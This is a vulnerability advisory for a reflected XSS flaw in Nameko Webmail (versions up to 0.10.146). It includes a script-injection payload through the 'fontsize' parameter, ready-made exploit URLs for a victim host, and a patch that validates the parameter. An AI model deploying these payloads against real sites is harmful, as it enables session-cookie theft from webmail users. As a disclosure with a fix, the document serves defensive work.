* Nameko Webmail XSS Vulnerability on version <= 0.10.146
* ========================================================
*
* Homepage: http://www.wizshelf.org/nameko/
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================

Introduction:
-------------
Nameko is a set of tools for working with e-mails in PHP.
The core of Nameko is composed by a set of classes for
retrieve mail from a POP3 server, and parsing them to
get the body (both in plain text and HTML, if included)
and the attachments. Is included the NamekoWebmail, 
that is a powerful webmail.



Description:
------------
The XSS vulnerability is located on the credits page, where
is possible to change the font size by an http get request
(ex. fontsize=11). The "fontsize" variable write his content
inside a <style> tag that is possible to break and execute
any javascript inside a tag <script>. 

The URL for match the XSS, should be like (url-decoded): 

?fontsize=11pt;+}+</style><script>alert(document.cookie)</script><style>body+{+font-size:11




XSS URL:
--------
http[s]://** victim host **/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66

or

http[s]://** victim host **/?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66




Patch:
------
Is possible to patch this by make a check on the $_GET['FONTSIZE'] var,
making sure that it is numeric only.

// On file nameko.php (line 93):

	if($_GET[fontsize]) $_SESSION[FONTSIZE]=$_GET[fontsize];


// should be replaced with something like that:

	if(preg_match('/^[0-9]{2,2}$/', $_GET[fontsize])) {
		$_SESSION[FONTSIZE]=$_GET[fontsize];
	} else {
		$_SESSION[FONTSIZE]=11;
	}




CREDITS:
---------

This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)


LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.